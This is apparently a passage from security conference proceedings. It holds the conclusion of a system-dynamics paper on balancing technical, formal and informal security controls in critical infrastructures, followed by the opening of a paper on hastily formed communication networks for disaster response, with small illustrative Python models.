As mentioned before, there is some inertia in the system: it takes some time before lower risk is perceived through the Perceived Impact Trend. The loops B2 and B3 act like brakes on the system. As more security controls are implemented, new ones become more costly, slowing down the initiation rate of new controls. The logic behind this is that the most straightforward and least expensive controls are usually implemented first; as controls become more advanced, they also become more costly to implement and maintain. If security strategies are reactive, only the absolute minimum security level is maintained under the normal condition of infrequent incidents. It is only when something happens that management and staff start to care about security. This is natural; they perceive their security level almost exclusively through incidents that have happened to them. When audit mechanisms and risk assessments are not in place, it is difficult to tell whether you have good security or are just being lucky.
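Loop B1 can be made concrete with a small simulation. The sketch below is ours: the functional forms and parameter values are illustrative assumptions (the published model is qualitative), but it reproduces the goal-seeking-with-delays behaviour just described, in which controls build up after incidents and then erode once the perceived impact falls:

DT = 0.25                      # time step (months)
THREAT = 10.0                  # constant attack pressure (assumed)
DESIRED = 2.0                  # tolerated impact level, the loop's goal
PERCEPTION_DELAY = 6.0         # Time to Change Perception of Impact Trend
IMPLEMENT_TIME = 3.0           # Time to Implement Controls
OBSOLESCENCE_TIME = 12.0       # Controls Obsolescence Time

initiated, in_place = 0.0, 0.0
perceived_impact = 0.0

for step in range(int(60 / DT)):
    impact = THREAT / (1.0 + in_place)           # controls in place reduce impact
    perceived_impact += (impact - perceived_impact) / PERCEPTION_DELAY * DT
    gap = max(0.0, perceived_impact - DESIRED)   # Perceived Security Gap
    initiation = gap                             # reactive: resources follow the gap
    implementation = initiated / IMPLEMENT_TIME
    depreciation = in_place / OBSOLESCENCE_TIME
    initiated += (initiation - implementation) * DT
    in_place += (implementation - depreciation) * DT
    if step % int(6 / DT) == 0:
        print(f"t={step * DT:4.1f} impact={impact:5.2f} controls={in_place:5.2f}")

Printing the trajectory shows controls building up in response to the initial impact and then levelling off or eroding as the perceived gap closes, the pattern the text attributes to purely reactive strategies.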
3 Security Is a Complex System
Securing systems, especially those related to energy, transportation and ICT, is a complex task that requires implementing several types of security controls. These controls can be divided into different categories. Often cited in the security literature are technical, formal and informal controls [15,16,17]. Other authors propose analogous classifications using different names for similar security controls, e.g. technology controls, process controls and human controls [18]. For the purpose of this research we use technical, formal and informal controls to refer to the three aspects of security. These controls are defined as follows:
Technical Controls: Hardware and software tools that restrict access to buildings, rooms, computer systems and programs in order to avoid unauthorised access or incorrect use (biometric devices, locks, antivirus software, firewalls, Intrusion Detection Systems (IDS), backups, etc.).
Formal Controls: The set of policies and procedures for managing access to and use of information. A subset of formal controls are those used to establish and ensure the effective use of technical controls. Examples of formal controls include system audits, update mechanisms, risk evaluations, identification of security roles, segregation of responsibilities, implementation of indicators, etc.
Informal Controls: Interventions related to deploying information security through the workforce by enhancing user willpower and willingness. Examples include training employees, implementing security incentives, increasing commitment to security, and motivating users. Basically, we are here talking about that elusive "security culture".
These three security controls constitute a trinity of controls that are all necessary to achieve high security performance, especially because they are hierarchically dependent. Failure in one control may open up holes in another (see Fig. 2). However, our experience indicates that information security practices in several critical infrastructures are based merely on technical solutions. Security incidents, often of a technical nature (viruses, worms and denial-of-service attacks), have positioned technological improvements over managerial solutions [19]. Another reinforcing factor is the profile of most security department staff. They usually have strong technical backgrounds and undeveloped managerial skills. They see themselves as technicians, not as managers, and therefore analytical, managerial and interpersonal skills are not worked upon. These skills are considered necessary to implement formal and informal controls [18].
A further complication is that implementing and maintaining controls is not straightforward. Each category of controls differs from the others in the time it takes to implement, how often it must be renewed, reinforced or audited, as well as in the attack mechanisms used to penetrate it. This level of complexity makes the security problem tough to manage. There are now three loops (B1, B4 and B7) which expand the CI security picture (see Fig. 3).
Implementing and maintaining technical controls is usually relatively quick, at least compared to formal and informal controls. In general, the implementation and maintenance of an Intrusion Detection System can be carried out fairly quickly and provides immediate results. In other words, Time to Implement Technical Controls has a low value (minutes, hours, sometimes days) in comparison to, for example, training users against social engineering threats (months or even years). Formal controls (e.g., implementing a system to measure the effectiveness of security controls) require longer implementation times, and their implementation regularly requires getting people involved in the process. It takes time before the effectiveness of such controls can be seen. In other words, Time to Implement Formal Controls has a higher value than Time to Implement Technical Controls. Informal controls (e.g., launching an awareness campaign, getting people involved and explaining the benefits and needs) are even harder to implement, since this usually takes an even longer period of time. That is, Time to Implement Informal Controls has a higher value than both Time to Implement Formal Controls and Time to Implement Technical Controls. Building a security culture needs years.
Although technical controls are the quickest to implement, they are also the controls that have to be renewed most often. Owing to rapid technological development, technical controls may become obsolete rapidly. Formal controls last longer than technical controls. When informal controls are fully in place, it can be interpreted as having a "security culture" where employees take security into account in their daily work and not just as an afterthought.
This requires a change of mind both for employees and, crucially, for management, as management sets precedence. If achieved, such a change of mind lasts. Instituting a security culture is critical, as it impacts the other two classes of controls: in the absence of a security culture, for example, formal controls may be just words on a piece of paper. Although informal controls are the most expensive and time-consuming to implement, they also function longer. This is not to say that they do not depreciate; a security culture which is not supported will wither and die. We can further complicate the picture. The three categories of security controls could be extended by making distinctions within each class (e.g., controls against internal or external attacks, controls against voluntary or involuntary incidents). For the purpose of this research, it is not necessary to go into more detail than the three types of controls previously explained. However, it is important to understand the interdependencies between them.
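The ordering of these time constants can be made tangible numerically. In the sketch below (ours; the values are order-of-magnitude assumptions reflecting the text's ranking, not measured data), each control class is a stock filled through its implementation delay and drained by obsolescence, under the same constant initiation effort:

DT = 0.25  # months
CLASSES = {            # (time to implement, obsolescence time), in months
    "technical": (0.5, 12.0),     # hours/days to implement, obsolete within a year
    "formal":    (6.0, 48.0),     # months to implement, lasts a few years
    "informal":  (24.0, 120.0),   # years to build, but a culture endures
}

for name, (t_impl, t_obs) in CLASSES.items():
    initiated, in_place = 0.0, 0.0
    for step in range(int(120 / DT)):                 # ten years
        implementation = initiated / t_impl           # implementation delay
        initiated += (1.0 - implementation) * DT      # constant initiation effort
        in_place += (implementation - in_place / t_obs) * DT
        if step * DT in (12.0, 60.0, 119.75):
            print(f"{name:9s} t={step * DT:6.1f}m in place={in_place:6.1f}")

Technical controls saturate within months but are capped by their short lifetime; informal controls accumulate slowly yet keep growing for years, which is the asymmetry the house-building metaphor in the next section builds on.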
Fig. 3. Trinity of Controls
4 Security Controls Are Not Independent
Technical controls depend on formal controls to function. Likewise, formal controls depend on informal controls to function well. For example, there is no point in password protection if the password is written on a post-it stuck to the screen. Password access control is a technical measure, while sticking the password to the screen can be considered a breach of formal routines. The lack of informal controls in this case is the user's lack of understanding of why passwords should not be stuck on the screen. This hierarchical dependence of security controls is shown in Fig. 4. In addition to the three loops shown in Fig. 3 (B1, B4, B7), we now have two more loops that significantly affect the ultimate goal of the system (decreasing the impact): 'Technical Depends on Formal' (B10) and 'Formal Depends on Informal' (B11) (see Fig. 4). The direct links from Informal Security Controls and Effective Formal Security Controls to Effective Security Controls represent defences against the impact of non-technical incidents; the attacker may, for example, use impersonation to gain confidential information. However, even if an incident is purely technical and technical controls are in place, an attack may still succeed because of inadequate formal controls. An example is when failure to install a patch allows a worm to infect the system. A lower-tech example is a simple door lock. To open the door, an attacker can attack the technical defence and pick the lock. A second option is to attack the formal layer: sloppy key management may allow access to the key. Third, the attacker can attack the informal layer by exploiting people's tendency to be helpful, e.g., using social engineering to have someone open the door for him. The effectiveness of implemented technical controls can be extended and improved by robust formal controls (B10). Likewise, informal controls ease the implementation of formal controls, extending and improving their effectiveness (B11). A useful metaphor for this dependency is a house-building process. The informal controls can be understood as a strong foundation. On the foundation, walls, or formal controls, can be raised, and ultimately the walls can support a roof, which is the technical controls. The foundation, walls and roof all mutually support each other to keep rain, wind and cold (attacks and/or incidents) out. Unfortunately, the controls presented above are often understood as independent layers where the first line of defence is based on technical countermeasures. The way in which information security has been approached until now can be compared to an upside-down house-building process: organisations usually start by implementing technical controls, follow with some formal controls, and then barely implement informal controls. These interdependencies are not apparent at first glance. If we take into account that informal controls require the most effort and the longest implementation times, this partially explains why information security departments often try to build their "security house" starting with the roof (technical controls), followed by the walls (formal controls), leaving the foundation (informal controls) for last.
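One possible formalisation of loops B10 and B11 is to let each layer's effectiveness scale that of the layer above it. The multiplicative form below is our own simplifying assumption; the paper deliberately leaves the exact shape of these dependencies open:

def effective_security(technical: float, formal: float, informal: float) -> float:
    """All arguments in [0, 1]. Returns overall effectiveness in [0, 1]."""
    effective_formal = formal * informal                  # B11: formal depends on informal
    effective_technical = technical * effective_formal    # B10: technical depends on formal
    # non-technical attacks are met directly by the formal and informal layers
    return (effective_technical + effective_formal + informal) / 3.0

# a strong roof on a weak foundation: heavy technical spend buys little
print(effective_security(technical=0.9, formal=0.3, informal=0.2))   # ~0.10
# a balanced investment of the same total effort performs markedly better
print(effective_security(technical=0.5, formal=0.5, informal=0.4))   # ~0.23

Even this toy form reproduces the paper's qualitative point: under hierarchical dependence, spending on the technical layer is largely wasted when the layers beneath it are weak.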
Fig. 4. Hierarchical Interdependence of Security Controls
The difficulty of building strong informal controls, i.e. a security culture, is widely recognised. This has led to various attempts to compensate by building very strong formal controls, as evidenced by the large number of information security standards that currently exist; examples include the ISO 27000 series and COBIT, to mention just a couple. However, implementing strong formal controls is not possible without implementing strong informal controls. There is a difference between what is written on paper and what is actually done in organisations, and failure to build a security culture will sabotage attempts at introducing formal controls. In a sense, it is like trying to compensate for a shaky foundation by building thicker walls. This clearly does not help.
Fig. 5. CI Security Strategy
We do not propose adopting a bottom-to-top security approach: without any technical and formal controls at all, a critical infrastructure would clearly be vulnerable even with very strong informal controls, although, we believe, less so. Instead, we stress the importance of paying simultaneous attention to all three categories of controls and of thinking long term. One should not just take into account what happened yesterday, but also what might happen in the future. Failing to assign resources to build up and maintain any class of security controls could have severe consequences, since the system becomes permeable to potential attacks. This security approach, further explained in [2], is based on the assumption that if an attacker finds and exploits a single vulnerability in any of the three controls (the holes in the cheese represent vulnerabilities), then the CI's critical assets could become accessible (see Fig. 5).
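A toy calculation (probabilities invented purely for illustration) shows why, on this reading, the weakest class of controls dominates overall exposure: unlike serial defence-in-depth, a hole in any one layer may suffice.

p_hole = {"technical": 0.05, "formal": 0.20, "informal": 0.30}

# probability that a given attempt finds an exploitable hole in at least one
# layer, treating the layers as independent attack surfaces (a simplification)
p_safe = 1.0
for layer, p in p_hole.items():
    p_safe *= (1.0 - p)
print(f"P(breach) = {1.0 - p_safe:.2f}")   # 0.47, dominated by the weak layers

Halving the technical hole probability barely moves the result, whereas strengthening the informal layer does, which is consistent with the resource-distribution argument above.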
5 Conclusions and Observations
A fairly large number of critical infrastructures hold a technology-based view of managing information security, which increases the probability of major disruptions to society. Their focus is primarily on technical solutions, without a holistic view of the system, and their strategies are reactive and improvised. The lack of indicators and risk assessments in many cases leaves these critical systems in a situation where security management models are not reviewed and the evolution of the organisation's security level is often unknown. As a result, security solutions are in many cases applied to symptoms instead of mitigating the root of the problem. Security management in many organisations has not yet been elevated to the level of strategy. Their security management process is tactical, i.e. it concerns the allocation of resources already built up, not the build-up of resources. These reactive security processes are a consequence of the understanding that stakeholders have of security. For some of them, security is the process of implementing technical controls. For others, security actions are based purely on regulatory laws, which not only changes the security focus but also causes costly and inefficient investments, as CIs secure only those assets and processes subject to regulation. Information security in CI must be extended to encompass something approximating the CIA-NR definition, where achieving confidentiality, integrity, availability and
non-repudiation starts by understanding the interdependencies between the three classes of security controls presented in this paper. Based on our data and findings, we believe that an effective security management strategy relies on the simultaneous implementation of technical, formal and informal controls. However, we know little about the degree to which these controls depend on each other, that is, how much Technical Controls depend on Formal Controls, and Formal Controls on Informal Controls. The shapes of the curves describing these relationships are still unknown; they are probably not linear and are likely to vary from organisation to organisation. Therefore, effort should be dedicated to investigating them. Another relationship that lacks empirical data and needs further development is that between Effective Security Controls and Impact. More insight into these relationships would improve the basis for CI security policy design and implementation. It would also allow us to develop the qualitative model presented in this paper further, into a simulation model. Finally, the process of building conceptual models using SD turned out to be fruitful for thinking about the dynamics of information security. The approach used in this paper allowed us to better understand the different interactions, interdependencies and time delays that exist in CI information security systems. Managing information security in CI is more complex than the diagrams shown above (see Fig. 4), but such a simple diagram provides a framework on which more complex models can be built. It is a tool that helps managers and security professionals think about security without getting bogged down in all the small details.
References
1. Schneier, B.: Applied Cryptography: Protocols, Algorithms, and Source Code in C, 1st edn. John Wiley and Sons Inc., New York (1994)
2. Torres, J.M., Sarriegi, J.M.: Dynamics aspects of security management of information systems (2004)
3. Mitnick, K.: The Art of Deception. John Wiley Inc., Indianapolis (2002)
4. Anderson, R.: Proceedings of 17th Annual Computer Security Applications Conference, ACSAC 2001, New Orleans, Louisiana (2001)
5. Dhillon, G.: Computers & Security 20(2), 165 (2001)
6. Forrester, J.: Industrial Dynamics. Productivity Press, Cambridge (1961)
7. Sterman, J.D.: Business Dynamics: Systems Thinking and Modeling for a Complex World. Irwin/McGraw-Hill, Boston (2000)
8. Torres, J.M.: An information systems security management framework for small and medium size enterprises. Ph.D. thesis, Tecnun, University of Navarra (2007)
9. Sarriegi, J.M., Torres, J.M., Santos, I.D., Egozcue, J.E., Liberal, D.: Modeling and simulating information security management (2007)
10. Richardson, G.P., Andersen, D.F.: System Dynamics Review 11(2), 113 (1995)
11. Vennix, J.A., Andersen, D.F., Richardson, G.P., Rohrbaugh, J.: In: Morecroft, J.D.W., Sterman, J.D. (eds.) Modeling for Learning Organizations. Productivity Press, Portland (1994)
12. Vennix, J.A.: System Dynamics Review 15(4), 379–401 (1999)
13. Warren, K.: Competitive Strategy Dynamics. John Wiley & Sons, Ltd., Chichester (2002)
14. Warren, K.: Strategic Management Dynamics. John Wiley & Sons, Ltd., Chichester (2008)
15. Botha, R., Gaadingwe, T.: Computers & Security 25(4), 247 (2006)
16. Dhillon, G.: Information Management & Computer Security 7(4), 171 (1999)
17. Dhillon, G., Moores, S.: Computers & Security 20(8), 715 (2001)
18. Schneier, B.: Beyond Fear, 1st edn. Copernicus Books, New York (2003)
19. Sarriegi, J.M., Eceiza, E., Torres, J.M., Santos, J.: Informe sobre la Gestion de la Seguridad de los Sistemas de Informacion. Miramon Enpresa Digitala (2005)
Emerging Information Infrastructures: Cooperation in Disasters
Mikael Asplund1, Simin Nadjm-Tehrani1, and Johan Sigholm2
1 Department of Computer and Information Science, Linköping University, SE-581 83 Linköping, Sweden {mikas,simin}@ida.liu.se
2 Swedish National Defence College, Drottning Kristinas väg 37, SE-115 93 Stockholm, Sweden
[email protected] Abstract. Disasters are characterised by their devastating effect on human lives and on society's ability to function. Unfortunately, rescue operations and the possibility of re-establishing a working society after such events are often hampered by the lack of functioning communication infrastructures. This paper describes the challenges ahead in creating new communication networks to support post-disaster operations, and sets them in the context of current issues in the protection of critical infrastructures. The analysis reveals that while there are some common concerns, there are also fundamental differences. The paper serves as an overview of some promising research directions and as a pointer to existing work in these areas.
1 Introduction
Reliable and secure communication is at the heart of well-being and of the delivery of critical services in today's society, making power grids, financial services, transportation, government and defence highly dependent on ICT networks. Unfortunately, the complexity and interdependencies of these systems make them vulnerable to faults, attacks and accidents. One adverse condition may have unforeseen consequences in other dependent networks (e.g., electricity networks' dependence on communication protocols, leading to blackouts as opposed to local outages). Even worse, when a major disaster strikes, such as Hurricane Katrina or the tsunami in East Asia, large parts of the critical infrastructure can be completely incapacitated for weeks. In those situations we need to re-establish infrastructures to support rescue operations and the transition back to a normal state. For timely delivery of critical services to citizens and decision makers, two types of competence are therefore needed: (1) protecting existing infrastructures so that we can continue to enjoy the delivery of reliable services despite the increasing threat picture (locally and globally); and (2) moving forward to study the issue of reliability and security in new networked infrastructures that represent a new paradigm in service delivery.
This work was supported by the Swedish Civil Contingencies Agency and the second author was partially supported by the University of Luxembourg.
The main characteristics of these new networks are their loosely connected nature, in some cases combined with mobility, and generally the involvement of several actors as opposed to a single owner/administrator. One example of such an "infrastructure-less" network is captured by the notion of hastily formed networks built up in response to disasters. Establishing effective communication in the presence of adverse events and outages requires a combination of human processes and technical development. Traditional critical infrastructures need the integration of cultural, economic and technical analyses (security should not be considered a cost but an asset ensuring service continuity). Spontaneous networks require dealing with the challenge of enforcing security without a central authority, in addition to novel technical solutions that provide a basis for a conversation space [13] across heterogeneous subnets. The goal of this paper is to describe some of the challenges ahead in emerging critical information infrastructures. These have to be handled when considering the migration path from today's critical information infrastructures to the emerging ones. To make the challenges explicit, we use the case of infrastructures in post-disaster operation to highlight the technical issues. If we can solve the problems in this setting, we can also solve them in the pre-disaster state of the convergent networks. This requires a new way of thinking about how reliable and timely message delivery can be accomplished in challenged environments, that is, without strong assumptions regarding organisations, technical equipment or system knowledge. The paper consists of two main parts. The first part (Section 2) deals with existing critical information infrastructures, and the second part (Section 3) with spontaneous post-disaster networks. Each part describes some of the main characteristics, the major research challenges ahead and an outlook on what we can expect in the coming years from ongoing research projects. Finally, Section 4 contains a summary and conclusions.
2 Existing Critical Information Infrastructures
We will now give an overview of the characteristics of current critical information infrastructures. We do not provide exhaustive coverage; rather, we give the background needed to later highlight the differences between the systems we have today and the spontaneous information networks that we believe will continue to grow in importance.
2.1 Characteristics
The larger part of today's information infrastructure is static and wireline. The networks are managed centrally or hierarchically [2] by known actors who do not change over time. Although communication problems can occur on particular links, redundancy often prevents network partitions from happening [30]. A recent trend is to put more and more services on top of the Internet [7], which has shown itself to be one of the most reliable information infrastructures even in the presence of adverse conditions [26] (although susceptible to frequent misconfiguration problems [31]). One of the biggest challenges here is probably overloads, which can be the result of a denial-of-service attack or of legitimate needs which peak at the
same time (e.g., major news web sites going down after 9/11). A notable illustration of this phenomenon is the adverse effect of TCP when used as the main communication protocol for connecting operation and management units in energy networks during a blackout [8]. Traditionally, many information networks have been proprietary and thus not suited to integration with other networks. In response, researchers and industry have started to explore the possibility of opening up systems in order to achieve greater resilience. However, this is not without complications [20]. Corporate entities are not willing to share too much information with other actors, since it might mean losing their business advantage. Moreover, there are regulations and policies regarding communication channels which must be adhered to. The problem is further complicated by the fact that information needs span borders, requiring international agreements.
2.2 Challenges
We believe that there are four main challenges to face in the near future in the area of information infrastructure protection, summarised in Table 1.

Table 1. Challenges for traditional infrastructures
Challenge                                  Emerging solutions
Complexity and interdependencies           Modelling and risk analysis
Transition from managed to unmanaged       Peer-to-peer technologies, self-managing systems
Heterogeneity                              Standardised protocols, overlay networks, software-defined radio
Organised threats with economic motives    Intrusion tolerance, diversity, partial
or adversary disruptions                   rejuvenation

The interdependencies between different types of infrastructures are one key aspect which makes protecting these systems a complicated task and an interesting research topic. For a good overview we refer to Rinaldi et al. [40], as well as to the outcomes of recent European projects [25,12]. For example, information infrastructures depend on electrical infrastructures and vice versa, and the same relationship holds between communication and transport systems. In order to fully understand these interdependencies, it is clear that we need good models of system behaviour, both under normal circumstances and in the event of crises [32]. The transition from static, managed networks to dynamic networks with little or no central control has already started. Peer-to-peer technologies are being used to share data, stream multimedia and manage computing capacity. Such networks have proven resilient to failures and overloads, but they cannot easily provide absolute service guarantees. In addition, an increasing proportion of network traffic is going through the wireless medium, using a wide variety of radio standards (e.g. GPRS, HSDPA, WiMAX, Wi-Fi). This brings new challenges of mobility, resource allocation and heterogeneity. Heterogeneity in the technical communication platforms brings two aspects to this equation. The multiplicity of communication technologies will bring a much-needed
diversity, but at the same time demands dealing with interoperability [39]. Solving these issues is as much an organisational problem as a technical one. Agreeing on standards between different countries and major corporations takes time and has a varying degree of success. Cyber attacks have gone from being a rare occurrence motivated by curiosity or malice to an economic and political weapon. Despite a large amount of research in the last few years, there are still many tough problems to solve, partly because new threats appear and partly because the systems themselves are changing and evolving. Means for achieving resilience or dependability can be broadly divided into proactive and reactive approaches, and experience shows that both are required. Proactive protection includes hardware redundancy [23], defence-in-depth, diversity and active replication, transparent software recovery [49], etc. Reactive mechanisms will need to cover the events that cannot be prevented. One of the main research areas in this context is that of intrusion detection systems [33,28], where researchers are trying to tackle an almost intractable challenge: detecting significant intrusions without also producing vast amounts of false alarms.
2.3 Outlook
The research on modelling of critical infrastructures will continue to be an active field for many years. It is important to understand that there are many levels at which modelling can be done, ranging from Guimera and Amaral's models of airport connections [21] to Svendsen and Wolthusen's generic graph-based analysis of resource flows [47]. We will certainly see more research of this kind; models will become more detailed, and hopefully good tools will be developed to manage them. The CRUTIAL project [12] is one of the major efforts in this direction, with a focus on electric power infrastructures. Moreover, we believe that the coming years will provide a wide range of solutions addressing the security and reliability of information infrastructures. Specifically, in Europe we have seen the launch of a number of recent projects that will bring partial solutions to this difficult equation: DIESIS [14] will provide simulation platforms for e-infrastructures, FORWARD [18] will build collective knowledge on the security threat landscape, threat detection and prevention, and WOMBAT [51] will create a live repository of actual and current threats to information infrastructures on a global basis. However, the set of solutions should also cover the migration to less centralised and more heterogeneous networks. This entails reusing some non-centralised solutions in new contexts, for example the potential convergence of P2P technologies, originally intended for wired infrastructures, with mobile ad hoc scenarios. The HIDENETS project [24] has addressed multihop vehicular networks (VANETs), which can potentially become part of a modern society's information infrastructure. Within the defence sector (as well as in civilian communities), one of the possible ways to deal with heterogeneity is the migration from conventional static radio platforms to systems incorporating reconfigurable software-defined radio (SDR) technology. The change in paradigm for military radio communication is not only expected to be a major money-saver, but also to grant the adopting countries the capability to
engage in multinational cooperation, such as international disaster relief operations, by utilising SDR bridging techniques between common and nation-specific waveforms. Replacing legacy radio platforms with modern SDR-based units conforming to international standards gives considerable tactical and operative advantages. The capability to share information is crucial to the effectiveness and success of a cooperative mission [1]. It also makes communication more cost-effective, since commercial off-the-shelf (COTS) equipment can be procured at a significantly lower price than developing bespoke equipment. Since the late 1990s the United States Department of Defense has spent a great deal of time and resources on researching and developing the SDR-based Joint Tactical Radio System (JTRS) [35], which is planned as the next-generation voice-and-data radio for use by the U.S. military in field operations after 2010. In Europe, similar techniques are being considered in the EDA joint research project European Secured Software Defined Radio Referential (ESSOR). These emerging information infrastructures will bring new problems and challenges to solve. In the rest of this paper we look at challenged networks for disaster response, in which the problems of emerging information infrastructures are taken to the extreme.
3 Disaster Response Infrastructures
3.1 Disaster Response Needs
It lies in the nature of unforeseen events and disasters that they are impossible to characterise in a uniform way. The needs and resources differ drastically depending on circumstances such as the scale of the event, which part of the world is affected, and the type of event (earthquake, flooding, fire, epidemic, etc.). However, two important problems can be identified:
– the need for a common operational picture, and
– the matching of needs and resources.
The military is often one of the key actors in the event of a disaster. The initial group of problems, to establish and manage interim information infrastructures, to distribute information, and to coordinate the relief engagement, is something the armed forces have long experience of dealing with. On the other hand, one of the biggest challenges for the military is to be able to participate in collaborative networked environments, such as hastily formed networks for disaster mitigation, while safeguarding valuable information and upholding confidentiality, integrity and non-repudiation properties. Information security in military command and control systems often depends on an outer perimeter, a well-defined security boundary beyond which classified information may not be distributed [48]. Making changes to this structure, such as interconnecting information systems with collaboration partners in a hastily formed network, requires new models for trust [27] and access control [6] in the mutual conversation space. The rest of this section targets the characteristics and challenges of hastily formed communication networks. That is, our focus here is on the technical challenges rather
than the organisational ones. Although it is precarious to generalise, we try to find some common features and problems associated with such systems. We base most of our reasoning on two of the most well-documented disasters in recent history: the tsunami in East Asia and Hurricane Katrina.
3.2 Characteristics
The infrastructures that will be needed in the event of an emergency cannot be carefully planned and modelled beforehand. They will emerge spontaneously and will rapidly change over time. Such systems are not intended to replace current systems for everyday use, since they are in many ways suboptimal. Their strength is the fact that they can be deployed when other communication networks have failed. Hastily Formed Networks (HFN) is a term coined by the Naval Postgraduate School in California, USA [13]. Figure 1 shows a possible scenario where different types of actors need to communicate with each other. These networks are quickly mobilised and organised, and coordinate massive responses. They have no common authority, but must all the same cooperate and collaborate during a massive as well as distributed response to an often chaotic and completely surprising situation. The networks also have to cope with insufficient resources and a lack of infrastructure. Their effectiveness rests on the quality of the conversation spaces established in the beginning. An experience report by Steckler et al. [46] from the aftermath of Hurricane Katrina shows that the wireless medium could be very effective for quickly establishing a network. Those networks were still mostly managed in a way similar to wired networks; creating and using ad hoc networks might have decreased the effort needed for set-up and management. However, this is not a mature technology and there are many challenges which do not exist in wired/cellular networks [50]. For example, there is a lack of global knowledge (decisions need to be taken based on a local view), the wireless medium needs to be shared between nodes that have not agreed beforehand on when and how to communicate, and communication disruptions are much more likely to occur [5].
Fig. 1. Disaster Response Scenario
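The dissemination problem under a purely local view can be illustrated with a minimal sketch of anti-entropy exchange, the idea underlying the store-and-forward and gossip-style protocols discussed below. The sketch and its names are ours, not a specific deployed system:

def contact(store_a: set, store_b: set) -> None:
    """Symmetric anti-entropy exchange during an opportunistic encounter:
    each node copies whatever the other is missing, with no global view."""
    missing_at_b = store_a - store_b
    missing_at_a = store_b - store_a
    store_b |= missing_at_b
    store_a |= missing_at_a

node1 = {"casualty-report-17", "road-blocked-A4"}
node2 = {"shelter-open-north"}
contact(node1, node2)
print(node1 == node2)   # True: both nodes now hold all three items

Repeated pairwise contacts of this kind spread information through a partitioned network as nodes move, at the cost of the storage and bandwidth issues taken up next.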
Just as time is an important factor in current information infrastructures (i.e., rapid discovery leads to faster containment of and recovery from blackouts), it will be equally important in HFN. These networks will, for example, be used to rapidly disseminate (manycast) information on the spread of damage, injuries and threats to lives. However, whereas fixed networks can deal with this using redundancy together with some basic level of differentiation, wireless and intermittently connected networks are harder to tackle.
3.3 Challenges
We suggest that there are five main technical challenges that make reliable and timely communication difficult in post-disaster settings, summarised in Table 2. Vast amounts of research have been devoted to each of these subjects separately, but few have tried to deal with them all at once. Unfortunately, all of them will be present in a large crisis situation.

Table 2. Challenges for disaster response infrastructures
Challenge                                        Emerging solutions
Disconnectivity as a norm                        Store-and-forward techniques, delay-tolerant networks (DTN)
Resource constraints                             Quality-of-service techniques, prioritisation, optimisation
Infeasibility to centrally manage                Distributed gossip-style protocols
Heterogeneity                                    Overlay networks, DTN bundles
Security: less organised opportunistic           Reputation-based systems, selfish-resistant
threats or adversary disruptions                 protocols, intrusion detection

Disconnectivity. A consequence of mobile wireless networks with resource constraints is network partitions. It will not be feasible for such a network to keep all nodes connected at all times. Network partitions do not only occur in wireless networks; fault-tolerant distributed systems research has dealt with them for a long time [41]. However, in those works disconnectivity is considered an exception and usually a rare event. This view of connectivity persisted even in research on mobile ad hoc networks, since most researchers assume dense networks with random mobility models, leading to fairly well-connected networks. However, recent research, for example by Kuiper and Nadjm-Tehrani [29], Fiore et al. [17] and Nelson et al. [36], emphasises that real-life mobility models imply that, for some applications, a contemporaneous path between nodes cannot be assumed. Although connectivity is quickly improving with the maturing of new technologies, this requires the existence of in-place infrastructure (satellite communication is still expensive and not available to all). To what extent future VANETs will have to rely on a fixed infrastructure is still an open question. An alternative is to devise protocols based on a store-and-forward principle, so that mobility is leveraged as a means to disseminate data in the network [45,42].
Resource constraints. Unfortunately, this is not as easy as just storing all data packets that are received and forwarding them in the hope that each message will reach its destination.
Due to the scarceness of energy and bandwidth, protocols will need to limit their transmissions and make sure that (1) packets are only disseminated if needed (i.e., have the highest utility) and (2) once a packet is transmitted, it indeed has a chance of making the hop (and subsequent hops); otherwise network resources are wasted to no avail. The problem of resource-aware delay-tolerant protocols has been studied by, for example, Haas and Small [22] and Balasubramanian et al. [4]. The key problem is deciding which packets are worthwhile to forward to neighbouring nodes, and when.
Infeasibility to centrally manage. The above approaches to optimising resource usage assume a high degree of knowledge about node movements. In a post-disaster scenario, this is not possible. Even the participants and operational clusters in a rescue operation are not known in advance. After the Katrina storm, the American Red Cross alone organised approximately 250,000 (volunteer) rescue workers [5]. This was an order of magnitude more than they had ever dealt with previously. Together with the fact that the situation is constantly changing, this means that nobody will have an up-to-date global view of what is going on. Thus, ideally, the communication protocols will need to function without knowledge of network topology, node addresses, node movements, traffic demands, etc.
Heterogeneity. The fourth challenge is difficult to tackle. It has to do with the fact that in an emergency situation there will be actors from many different parts of society, such as the police, military, fire fighters, medical personnel and volunteers. These actors need to cooperate with each other, but they will probably not have trained together, and they will have different technical equipment (ranging from special-purpose hardware such as the Tetra system to commercial off-the-shelf non-standardised products). One of the most challenging problems in a disaster scenario is to achieve both technical interoperability and social interoperability amongst the network of networks. A potential approach to achieving technical interoperability is the use of overlays such as delay-tolerant networks [16,38]. Moreover, software-defined radio facilitates implementing bridging techniques, as discussed in Section 2.3. Obtaining social interoperability on top of a given information infrastructure is a multi-disciplinary challenge.
Security. Some of the actors may even be adversarial themselves, wanting to disrupt or eavesdrop on communication. This brings us to the security challenge. How to solve the trust issue in an HFN is an open problem. Bad or selfish behaviour can be punished (e.g., by not allowing such nodes to participate in the network) if it is detected. Knowledge about misbehaving nodes can also be shared with others using reputation-based systems (e.g., Buchegger and Le Boudec [10]). However, such systems create new problems with false accusations and identity spoofing. In addition, we need distributed intrusion detection, as opposed to the proposed solutions in existing infrastructures, which are organised with a hierarchy of (well-placed) detectors and correlation agents. In disaster response scenarios, where at least a subset of rescue workers are trained for this purpose, and given the emerging trend towards standardisation of rescue terminology and exchange formats [43], we have a somewhat simpler problem than solving the general anomaly detection problem in Internet-based communication.
This situation is reminiscent of anomaly detection in SCADA systems, which can benefit from the well-defined communication patterns of normal scenarios.
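Returning to the resource-constraints challenge above, the core forwarding decision at a contact can be sketched as greedy selection by utility per byte within the contact's link budget. The bundle and utility model below is our own illustration; schemes such as that of Balasubramanian et al. [4] derive such utilities from estimated delivery delays:

from dataclasses import dataclass

@dataclass
class Bundle:
    name: str
    size_kb: int
    utility: float          # assumed marginal delivery benefit of one more copy

def plan_forwarding(buffer, budget_kb):
    """Greedy selection by utility density within the contact budget."""
    chosen = []
    for b in sorted(buffer, key=lambda b: b.utility / b.size_kb, reverse=True):
        if b.size_kb <= budget_kb:
            chosen.append(b)
            budget_kb -= b.size_kb
    return chosen

buffer = [Bundle("map-update", 800, 0.9),
          Bundle("triage-list", 50, 0.8),
          Bundle("photo", 2000, 0.3)]
for b in plan_forwarding(buffer, budget_kb=1000):
    print("forward:", b.name)
# forwards triage-list, then map-update; the photo waits for a better contact

The same ranking can drive buffer eviction when storage runs out, which is why utility estimation, rather than raw routing, is the crux of resource-aware DTN protocols.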
